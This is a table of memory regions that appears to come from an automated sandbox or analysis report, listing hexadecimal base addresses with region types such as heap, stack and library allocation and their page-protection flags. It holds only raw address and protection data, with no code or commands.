25D01884000
|
trusted library allocation
|
page read and write
|
||
|
6346C7F000
|
stack
|
page read and write
|
||
|
13FB3751000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03FC000
|
heap
|
page read and write
|
||
|
1B213100000
|
heap
|
page read and write
|
||
|
232642E4000
|
heap
|
page read and write
|
||
|
1F8C024A000
|
heap
|
page read and write
|
||
|
70E8CFC000
|
stack
|
page read and write
|
||
|
E0552F7000
|
stack
|
page read and write
|
||
|
1F8C03E1000
|
heap
|
page read and write
|
||
|
7FF848FDA000
|
trusted library allocation
|
page read and write
|
||
|
1F8BF678000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03EC000
|
heap
|
page read and write
|
||
|
1301000
|
unkown
|
page write copy
|
||
|
1E25B030000
|
heap
|
page read and write
|
||
|
2325EB02000
|
heap
|
page read and write
|
||
|
C000110000
|
direct allocation
|
page read and write
|
||
|
B88ABFE000
|
stack
|
page read and write
|
||
|
C000084000
|
direct allocation
|
page read and write
|
||
|
53F407B000
|
stack
|
page read and write
|
||
|
AE10F7E000
|
stack
|
page read and write
|
||
|
2325F215000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
|
2325EAB3000
|
heap
|
page read and write
|
||
|
132E000
|
unkown
|
page read and write
|
||
|
D94A533000
|
stack
|
page read and write
|
||
|
25D725F9000
|
heap
|
page read and write
|
||
|
7FF848E23000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8C0390000
|
heap
|
page read and write
|
||
|
25D011EC000
|
trusted library allocation
|
page read and write
|
||
|
FCA000
|
unkown
|
page readonly
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
13FBB860000
|
heap
|
page read and write
|
||
|
25D70251000
|
heap
|
page read and write
|
||
|
1EE58FEA000
|
trusted library allocation
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
D94AEFB000
|
stack
|
page read and write
|
||
|
13FBBC14000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
26B901A0000
|
trusted library allocation
|
page read and write
|
||
|
C00009A000
|
direct allocation
|
page read and write
|
||
|
23265000000
|
heap
|
page read and write
|
||
|
234B40BB000
|
heap
|
page read and write
|
||
|
1F8BF814000
|
heap
|
page read and write
|
||
|
2BB877CD000
|
trusted library allocation
|
page read and write
|
||
|
2BB8395B000
|
heap
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
C2047E000
|
stack
|
page read and write
|
||
|
AE116FB000
|
stack
|
page read and write
|
||
|
13FA1903000
|
heap
|
page read and write
|
||
|
1913DDCB000
|
heap
|
page read and write
|
||
|
45EDE7F000
|
stack
|
page read and write
|
||
|
7FF8491B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
|
2325EA8D000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1EE59431000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03F8000
|
heap
|
page read and write
|
||
|
23499CA0000
|
heap
|
page read and write
|
||
|
28E2B8F0000
|
heap
|
page read and write
|
||
|
1399000
|
unkown
|
page write copy
|
||
|
13FBB754000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
AE10DFE000
|
unkown
|
page readonly
|
||
|
25D70259000
|
heap
|
page read and write
|
||
|
1F8C5AC9000
|
trusted library allocation
|
page read and write
|
||
|
FE579BF000
|
stack
|
page read and write
|
||
|
1B213150000
|
heap
|
page read and write
|
||
|
2325F840000
|
trusted library allocation
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03EC000
|
heap
|
page read and write
|
||
|
B8D4CFF000
|
stack
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
231D63A0000
|
heap
|
page read and write
|
||
|
1EE59021000
|
trusted library allocation
|
page read and write
|
||
|
C0000BC000
|
direct allocation
|
page read and write
|
||
|
1F8BF628000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024A000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C5A11000
|
trusted library allocation
|
page read and write
|
||
|
16486EA5000
|
heap
|
page read and write
|
||
|
2BB83960000
|
heap
|
page read and write
|
||
|
12FF000
|
unkown
|
page write copy
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
23264000000
|
trusted library allocation
|
page read and write
|
||
|
262571DB000
|
heap
|
page read and write
|
||
|
1F8C03F3000
|
heap
|
page read and write
|
||
|
1F8C0951000
|
trusted library allocation
|
page read and write
|
||
|
7FF849162000
|
trusted library allocation
|
page read and write
|
||
|
C0002B2000
|
direct allocation
|
page read and write
|
||
|
22F3FED0000
|
heap
|
page read and write
|
||
|
C206B8000
|
stack
|
page read and write
|
||
|
23264010000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F8C0388000
|
heap
|
page read and write
|
||
|
1F8C03F9000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD7C0000
|
heap
|
page read and write
|
||
|
1F8C58E0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
25D70190000
|
heap
|
page read and write
|
||
|
C00000C000
|
direct allocation
|
page read and write
|
||
|
1F8C03D8000
|
heap
|
page read and write
|
||
|
3C3D4FF000
|
stack
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C03F3000
|
heap
|
page read and write
|
||
|
7FF84916C000
|
trusted library allocation
|
page read and write
|
||
|
19A2D120000
|
heap
|
page read and write
|
||
|
13FBB8B6000
|
heap
|
page read and write
|
||
|
C000124000
|
direct allocation
|
page read and write
|
||
|
7FF849200000
|
trusted library allocation
|
page read and write
|
||
|
1F8C039E000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0248000
|
heap
|
page read and write
|
||
|
25390BB0000
|
heap
|
page read and write
|
||
|
1EE57327000
|
heap
|
page read and write
|
||
|
23499D05000
|
heap
|
page read and write
|
||
|
1F8C0789000
|
heap
|
page read and write
|
||
|
7FF848E22000
|
trusted library allocation
|
page read and write
|
||
|
13FBB920000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF849002000
|
trusted library allocation
|
page read and write
|
||
|
C000032000
|
direct allocation
|
page read and write
|
||
|
7FF8490E7000
|
trusted library allocation
|
page read and write
|
||
|
E054E7D000
|
stack
|
page read and write
|
||
|
7FF8491D0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024D000
|
heap
|
page read and write
|
||
|
3C3D67C000
|
stack
|
page read and write
|
||
|
234B3DCD000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
23499FEC000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2BB838A0000
|
heap
|
page read and write
|
||
|
C0002A4000
|
direct allocation
|
page read and write
|
||
|
C000004000
|
direct allocation
|
page read and write
|
||
|
D94A5FF000
|
stack
|
page read and write
|
||
|
2466BEE8000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F8C0241000
|
heap
|
page read and write
|
||
|
1F8C0407000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C5825000
|
trusted library allocation
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
C00008E000
|
direct allocation
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
302D77F000
|
stack
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0456000
|
heap
|
page read and write
|
||
|
1E25B3F0000
|
heap
|
page read and write
|
||
|
13FBBB68000
|
heap
|
page read and write
|
||
|
1F8C03D8000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
13FBBB24000
|
heap
|
page read and write
|
||
|
1EE713D0000
|
heap
|
page read and write
|
||
|
C00002C000
|
direct allocation
|
page read and write
|
||
|
232642FC000
|
heap
|
page read and write
|
||
|
1F0BD93C000
|
heap
|
page read and write
|
||
|
C000065000
|
direct allocation
|
page read and write
|
||
|
1F8C0225000
|
heap
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
C000208000
|
direct allocation
|
page read and write
|
||
|
CA8407E000
|
unkown
|
page readonly
|
||
|
26257414000
|
direct allocation
|
page read and write
|
||
|
2326422A000
|
heap
|
page read and write
|
||
|
AE10AFB000
|
stack
|
page read and write
|
||
|
2BB83964000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
C000053000
|
direct allocation
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
E0554FE000
|
stack
|
page read and write
|
||
|
1F8C0267000
|
heap
|
page read and write
|
||
|
1F8BF6A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD89A000
|
heap
|
page read and write
|
||
|
1F8C0245000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
13FA3C3C000
|
trusted library allocation
|
page read and write
|
||
|
1F7ABF50000
|
heap
|
page read and write
|
||
|
1F7ABDE0000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2349C98A000
|
trusted library allocation
|
page read and write
|
||
|
1EE572E4000
|
heap
|
page read and write
|
||
|
23264292000
|
heap
|
page read and write
|
||
|
1F8C0394000
|
heap
|
page read and write
|
||
|
1F0BD9B0000
|
heap
|
page read and write
|
||
|
2349BDE6000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0261000
|
heap
|
page read and write
|
||
|
65CBDFE000
|
stack
|
page read and write
|
||
|
1EE58F1E000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C03E1000
|
heap
|
page read and write
|
||
|
234B3E3C000
|
heap
|
page read and write
|
||
|
1F8C0225000
|
heap
|
page read and write
|
||
|
19A2D0A0000
|
heap
|
page read and write
|
||
|
1F8C023F000
|
heap
|
page read and write
|
||
|
1F8C0241000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1EE71367000
|
heap
|
page read and write
|
||
|
1F8C5A5F000
|
trusted library allocation
|
page read and write
|
||
|
1F7ABD00000
|
heap
|
page read and write
|
||
|
1E25B130000
|
heap
|
page read and write
|
||
|
C00009C000
|
direct allocation
|
page read and write
|
||
|
F4D000
|
unkown
|
page readonly
|
||
|
1F8C5AC9000
|
trusted library allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
19A1F388000
|
heap
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
FE575FE000
|
stack
|
page read and write
|
||
|
FE5783E000
|
stack
|
page read and write
|
||
|
AB217B000
|
stack
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
C000043000
|
direct allocation
|
page read and write
|
||
|
23264302000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
C000034000
|
direct allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
2349C177000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
19A1F380000
|
heap
|
page read and write
|
||
|
CA8447E000
|
unkown
|
page readonly
|
||
|
FE5727E000
|
stack
|
page read and write
|
||
|
7FF849220000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
231D6370000
|
heap
|
page read and write
|
||
|
19A2D2A5000
|
heap
|
page read and write
|
||
|
1F8C03BE000
|
heap
|
page read and write
|
||
|
7FF848EDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2325FB40000
|
trusted library section
|
page readonly
|
||
|
16103790000
|
heap
|
page read and write
|
||
|
E05557E000
|
stack
|
page read and write
|
||
|
C2093B000
|
stack
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
5736B7F000
|
stack
|
page read and write
|
||
|
1F8C0249000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0258000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
13FA31A0000
|
trusted library allocation
|
page read and write
|
||
|
234B3E63000
|
heap
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C024D000
|
heap
|
page read and write
|
||
|
25D00083000
|
trusted library allocation
|
page read and write
|
||
|
161037A0000
|
heap
|
page read and write
|
||
|
13FA19BA000
|
heap
|
page read and write
|
||
|
25D00F77000
|
trusted library allocation
|
page read and write
|
||
|
2325EA40000
|
heap
|
page read and write
|
||
|
1F8C0412000
|
heap
|
page read and write
|
||
|
C0000D3000
|
direct allocation
|
page read and write
|
||
|
1F8C045B000
|
heap
|
page read and write
|
||
|
1F8C0370000
|
heap
|
page read and write
|
||
|
25D00F6F000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD8D2000
|
heap
|
page read and write
|
||
|
2326424C000
|
heap
|
page read and write
|
||
|
2349C964000
|
trusted library allocation
|
page read and write
|
||
|
776757F000
|
stack
|
page read and write
|
||
|
26257080000
|
heap
|
page read and write
|
||
|
E05537A000
|
stack
|
page read and write
|
||
|
AB227E000
|
stack
|
page read and write
|
||
|
1F8C0388000
|
heap
|
page read and write
|
||
|
FE57A3B000
|
stack
|
page read and write
|
||
|
9D72D0D000
|
stack
|
page read and write
|
||
|
E77B13E000
|
stack
|
page read and write
|
||
|
2466BE50000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
1F0BD8F3000
|
heap
|
page read and write
|
||
|
1F8C5442000
|
trusted library allocation
|
page read and write
|
||
|
AE105FE000
|
unkown
|
page readonly
|
||
|
1F8C03AA000
|
heap
|
page read and write
|
||
|
1F8C0438000
|
heap
|
page read and write
|
||
|
1F8C03B8000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
232642E6000
|
heap
|
page read and write
|
||
|
AE112FE000
|
unkown
|
page readonly
|
||
|
19A2D2B0000
|
heap
|
page read and write
|
||
|
13FA40A1000
|
trusted library allocation
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
6BFFEFC000
|
stack
|
page read and write
|
||
|
1913DD00000
|
heap
|
page read and write
|
||
|
2349B8E0000
|
heap
|
page execute and read and write
|
||
|
25D701C2000
|
heap
|
page read and write
|
||
|
B8D4BFF000
|
unkown
|
page read and write
|
||
|
1F0BF2C4000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
|
776747C000
|
stack
|
page read and write
|
||
|
1F8BF690000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
25D724E1000
|
heap
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
1363000
|
unkown
|
page read and write
|
||
|
D94AC7A000
|
stack
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C03C4000
|
heap
|
page read and write
|
||
|
3C3D476000
|
stack
|
page read and write
|
||
|
20FEB3D0000
|
heap
|
page read and write
|
||
|
1F8C0402000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF848FDA000
|
trusted library allocation
|
page read and write
|
||
|
70E8EFF000
|
stack
|
page read and write
|
||
|
1EE572BD000
|
heap
|
page read and write
|
||
|
23499CD0000
|
heap
|
page read and write
|
||
|
13FBBC22000
|
heap
|
page read and write
|
||
|
1F8C023D000
|
heap
|
page read and write
|
||
|
DAAAA7D000
|
stack
|
page read and write
|
||
|
2325E9B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
CA83F7E000
|
stack
|
page read and write
|
||
|
1F8C5AC9000
|
trusted library allocation
|
page read and write
|
||
|
25390EF0000
|
heap
|
page read and write
|
||
|
E054FF7000
|
stack
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1EE57260000
|
heap
|
page read and write
|
||
|
65CBBFF000
|
stack
|
page read and write
|
||
|
1EE71342000
|
heap
|
page read and write
|
||
|
234B3E03000
|
heap
|
page read and write
|
||
|
1F0BD7A0000
|
heap
|
page read and write
|
||
|
1F8C03BE000
|
heap
|
page read and write
|
||
|
C205B7000
|
stack
|
page read and write
|
||
|
7FF848FE4000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03EC000
|
heap
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
13FA3BD7000
|
trusted library allocation
|
page read and write
|
||
|
C202F9000
|
stack
|
page read and write
|
||
|
25D72607000
|
heap
|
page read and write
|
||
|
220FB430000
|
heap
|
page read and write
|
||
|
13FA1815000
|
heap
|
page read and write
|
||
|
AE107FE000
|
unkown
|
page readonly
|
||
|
23DBAFF0000
|
heap
|
page read and write
|
||
|
1851F7F0000
|
heap
|
page read and write
|
||
|
1F0BD830000
|
trusted library allocation
|
page read and write
|
||
|
25390C4B000
|
heap
|
page read and write
|
||
|
2325EA9D000
|
heap
|
page read and write
|
||
|
23263FA3000
|
trusted library allocation
|
page read and write
|
||
|
7FF849122000
|
trusted library allocation
|
page read and write
|
||
|
25D01AD0000
|
trusted library allocation
|
page read and write
|
||
|
C208BE000
|
stack
|
page read and write
|
||
|
1F8C023F000
|
heap
|
page read and write
|
||
|
1F8C5980000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F8C03C8000
|
heap
|
page read and write
|
||
|
13FB37DF000
|
trusted library allocation
|
page read and write
|
||
|
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
3C3D5FE000
|
stack
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
13FA37DB000
|
trusted library allocation
|
page read and write
|
||
|
26257180000
|
heap
|
page read and write
|
||
|
2466BE20000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F8C03B9000
|
heap
|
page read and write
|
||
|
C000036000
|
direct allocation
|
page read and write
|
||
|
AB1D1E000
|
stack
|
page read and write
|
||
|
13FB3760000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
25D701B9000
|
heap
|
page read and write
|
||
|
1F8C5880000
|
trusted library allocation
|
page read and write
|
||
|
77674FF000
|
stack
|
page read and write
|
||
|
C00012E000
|
direct allocation
|
page read and write
|
||
|
2BB85260000
|
heap
|
page read and write
|
||
|
2349C99F000
|
trusted library allocation
|
page read and write
|
||
|
25D00F6B000
|
trusted library allocation
|
page read and write
|
||
|
13FA1820000
|
heap
|
page read and write
|
||
|
16103A25000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
25D10001000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
2325F950000
|
trusted library allocation
|
page read and write
|
||
|
C00002E000
|
direct allocation
|
page read and write
|
||
|
C000102000
|
direct allocation
|
page read and write
|
||
|
28E2B9B0000
|
heap
|
page read and write
|
||
|
B88ADFE000
|
stack
|
page read and write
|
||
|
2F254FE000
|
stack
|
page read and write
|
||
|
25D00A50000
|
trusted library allocation
|
page read and write
|
||
|
13FBBBF8000
|
heap
|
page read and write
|
||
|
19A2D2A0000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
CA83E7E000
|
unkown
|
page readonly
|
||
|
262571D9000
|
heap
|
page read and write
|
||
|
161037C8000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
25390EE0000
|
heap
|
page read and write
|
||
|
1F8C03D8000
|
heap
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03C0000
|
heap
|
page read and write
|
||
|
1851F810000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
53F41FC000
|
stack
|
page read and write
|
||
|
199CC080000
|
heap
|
page read and write
|
||
|
25D00F66000
|
trusted library allocation
|
page read and write
|
||
|
25D01038000
|
trusted library allocation
|
page read and write
|
||
|
E69000
|
unkown
|
page readonly
|
||
|
1E803210000
|
heap
|
page read and write
|
||
|
23499F40000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03FC000
|
heap
|
page read and write
|
||
|
2349BCCB000
|
trusted library allocation
|
page read and write
|
||
|
199CC0D1000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03EC000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C03D2000
|
heap
|
page read and write
|
||
|
232642C8000
|
heap
|
page read and write
|
||
|
E0551F9000
|
stack
|
page read and write
|
||
|
2325F202000
|
heap
|
page read and write
|
||
|
1F8C0267000
|
heap
|
page read and write
|
||
|
13FA18FC000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
7DF43B560000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E857B85000
|
heap
|
page read and write
|
||
|
C0002BE000
|
direct allocation
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1F8C0392000
|
heap
|
page read and write
|
||
|
23499DEE000
|
heap
|
page read and write
|
||
|
1F0BD933000
|
heap
|
page read and write
|
||
|
1327000
|
unkown
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
20FEB3C0000
|
heap
|
page read and write
|
||
|
1F8C0259000
|
heap
|
page read and write
|
||
|
E05567B000
|
stack
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1E25B2F0000
|
heap
|
page read and write
|
||
|
22F3FEF0000
|
heap
|
page read and write
|
||
|
D94ABF7000
|
stack
|
page read and write
|
||
|
1F8C58A0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
1F8C0438000
|
heap
|
page read and write
|
||
|
25D71B40000
|
trusted library allocation
|
page read and write
|
||
|
13FA1850000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
861000
|
unkown
|
page execute read
|
||
|
C000126000
|
direct allocation
|
page read and write
|
||
|
19A2D110000
|
heap
|
page read and write
|
||
|
199CC2F0000
|
heap
|
page read and write
|
||
|
1EE57268000
|
heap
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
22F3FFB0000
|
heap
|
page read and write
|
||
|
3C3D08C000
|
stack
|
page read and write
|
||
|
1EE57440000
|
trusted library allocation
|
page read and write
|
||
|
25D7025B000
|
heap
|
page read and write
|
||
|
2BB83BC0000
|
heap
|
page read and write
|
||
|
1EE59028000
|
trusted library allocation
|
page read and write
|
||
|
1F0BF1C4000
|
heap
|
page read and write
|
||
|
1F8C0438000
|
heap
|
page read and write
|
||
|
13FA17E0000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
E77AD7E000
|
stack
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C03C6000
|
heap
|
page read and write
|
||
|
2466BEE0000
|
heap
|
page read and write
|
||
|
C000122000
|
direct allocation
|
page read and write
|
||
|
C000092000
|
direct allocation
|
page read and write
|
||
|
1F7ABE1E000
|
heap
|
page read and write
|
||
|
25D017B7000
|
trusted library allocation
|
page read and write
|
||
|
1F8C041A000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
15FB3060000
|
heap
|
page read and write
|
||
|
1F8C03C8000
|
heap
|
page read and write
|
||
|
2326428F000
|
heap
|
page read and write
|
||
|
92D6AFF000
|
unkown
|
page read and write
|
||
|
2338C043000
|
heap
|
page read and write
|
||
|
6BFFFFF000
|
unkown
|
page read and write
|
||
|
E055279000
|
stack
|
page read and write
|
||
|
1F0BD93E000
|
heap
|
page read and write
|
||
|
FE56FF3000
|
stack
|
page read and write
|
||
|
1F8C023D000
|
heap
|
page read and write
|
||
|
92D6A79000
|
stack
|
page read and write
|
||
|
1913DCC0000
|
heap
|
page read and write
|
||
|
7FF84906D000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
232642F7000
|
heap
|
page read and write
|
||
|
C000096000
|
direct allocation
|
page read and write
|
||
|
22F401C5000
|
heap
|
page read and write
|
||
|
1F0BD866000
|
heap
|
page read and write
|
||
|
1F8C0469000
|
heap
|
page read and write
|
||
|
C000063000
|
direct allocation
|
page read and write
|
||
|
1E803190000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
E77B038000
|
stack
|
page read and write
|
||
|
25D71F20000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C5AC9000
|
trusted library allocation
|
page read and write
|
||
|
1F8C0267000
|
heap
|
page read and write
|
||
|
2BB85451000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
9A3747F000
|
stack
|
page read and write
|
||
|
1F0BD89B000
|
heap
|
page read and write
|
||
|
1F8C0289000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
25D7029B000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
1E25B241000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
page read and write
|
||
|
232642B8000
|
heap
|
page read and write
|
||
|
3A681FF000
|
stack
|
page read and write
|
||
|
C00004E000
|
direct allocation
|
page read and write
|
||
|
1F8C0225000
|
heap
|
page read and write
|
||
|
2349BDE3000
|
trusted library allocation
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
1F8C024B000
|
heap
|
page read and write
|
||
|
2325EA00000
|
heap
|
page read and write
|
||
|
65CB9FF000
|
stack
|
page read and write
|
||
|
CA8437E000
|
stack
|
page read and write
|
||
|
23263F10000
|
trusted library allocation
|
page read and write
|
||
|
2325EA6F000
|
heap
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
C00005F000
|
direct allocation
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
25390C72000
|
heap
|
page read and write
|
||
|
7DF43B580000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F8C0267000
|
heap
|
page read and write
|
||
|
1851F859000
|
heap
|
page read and write
|
||
|
25390EE5000
|
heap
|
page read and write
|
||
|
C000134000
|
direct allocation
|
page read and write
|
||
|
2BB83920000
|
heap
|
page read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C5AC7000
|
trusted library allocation
|
page read and write
|
||
|
25D72080000
|
heap
|
page execute and read and write
|
||
|
1F8C0252000
|
heap
|
page read and write
|
||
|
1F8C03E8000
|
heap
|
page read and write
|
||
|
AE104FE000
|
stack
|
page read and write
|
||
|
1EE58EC1000
|
trusted library allocation
|
page read and write
|
||
|
AE1107E000
|
stack
|
page read and write
|
||
|
1F8C03C4000
|
heap
|
page read and write
|
||
|
D94AE7E000
|
stack
|
page read and write
|
||
|
C0002B4000
|
direct allocation
|
page read and write
|
||
|
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
|
23264282000
|
heap
|
page read and write
|
||
|
23264310000
|
heap
|
page read and write
|
||
|
1F8C5AC4000
|
trusted library allocation
|
page read and write
|
||
|
1E803195000
|
heap
|
page read and write
|
||
|
231D6650000
|
heap
|
page read and write
|
||
|
13FBBB66000
|
heap
|
page read and write
|
||
|
1F0BD92F000
|
heap
|
page read and write
|
||
|
1F8C024C000
|
heap
|
